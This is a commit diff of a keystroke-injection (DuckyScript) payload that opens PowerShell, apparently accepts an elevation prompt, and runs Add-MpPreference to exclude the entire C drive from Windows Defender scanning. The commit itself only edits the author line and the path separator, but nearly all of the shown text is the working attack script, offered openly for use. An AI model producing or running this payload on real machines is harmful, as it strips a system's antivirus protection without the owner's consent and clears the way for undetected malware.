Update Add Exclusion C-drive.txt
This commit is contained in:
@@ -1,5 +1,5 @@
|
|||||||
REM Title: Add Exclusion C-drive
|
REM Title: Add Exclusion C-drive
|
||||||
REM Author: @beigeworm
|
REM Author: @beigeworm | https://github.com/beigeworm
|
||||||
REM Description: Uses Powershell to add an exclusion to Windows Defender to ingore any files within C:/
|
REM Description: Uses Powershell to add an exclusion to Windows Defender to ingore any files within C:/
|
||||||
REM Target: Windows 10
|
REM Target: Windows 10
|
||||||
|
|
||||||
@@ -16,7 +16,7 @@ ALT y
|
|||||||
DELAY 5000
|
DELAY 5000
|
||||||
|
|
||||||
REM add the exclusion path.
|
REM add the exclusion path.
|
||||||
STRING Add-MpPreference -ExclusionPath C:/
|
STRING Add-MpPreference -ExclusionPath C:\
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 250
|
DELAY 250
|
||||||
STRING exit
|
STRING exit
|
||||||
|
|||||||
Reference in New Issue
Block a user